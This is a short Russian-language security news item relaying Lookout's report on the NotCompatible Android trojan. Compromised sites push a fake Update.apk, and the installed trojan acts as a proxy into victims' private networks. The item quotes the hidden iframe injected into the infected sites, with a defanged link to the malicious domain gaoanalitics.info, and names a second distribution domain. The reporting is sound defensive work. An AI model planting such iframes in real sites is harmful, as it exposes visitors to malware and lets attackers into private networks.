По данным Lookout, единственной целью NotCompatible является получение доступа к частным сетям жертв.
Компания по защите мобильных платформ Lookout сообщила об угрозе вируса NotCompatible, который заражает Android устройства. При посещении контролируемого злоумышленниками сайта на систему пользователя загружается файл под названием Update.apk.
По окончании загрузки на экране устройства отображается окно, в котором пользователь должен подтвердить установку приложения. Также для установки приложения на устройстве должна быть включена настройка «Unknown sources». В случае если эта опция отключена, загрузка будет автоматически заблокирована.
Контролируемые или скомпрометированные злоумышленниками сайты содержат в себе такой код:
<iframe
style=”visibility: hidden; display: none; display: none;”
src=”hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}”></iframe>
Сайт с таким Iframe отображает ложное сообщение о том, что для просмотра содержимого необходимо осуществить установку дополнительного ПО. При этом загрузка программы осуществляется не с официального магазина Google Play.
По данным Lookout, троян NotCompatible выполняет функцию прокси, позволяющую получить доступ к частным сетям. При этом прямой вред зараженным устройствам не наносится.
Среди web-сайтов, осуществляющих распространение вредоносного кода, исследователи отмечают gaoanalitics.info и androidonlinefix.info. Оба сайта на момент публикации новости не работали.
С уведомлением Lookout можно ознакомиться здесь.
Большой взрыв знаний каждый день в вашем телефоне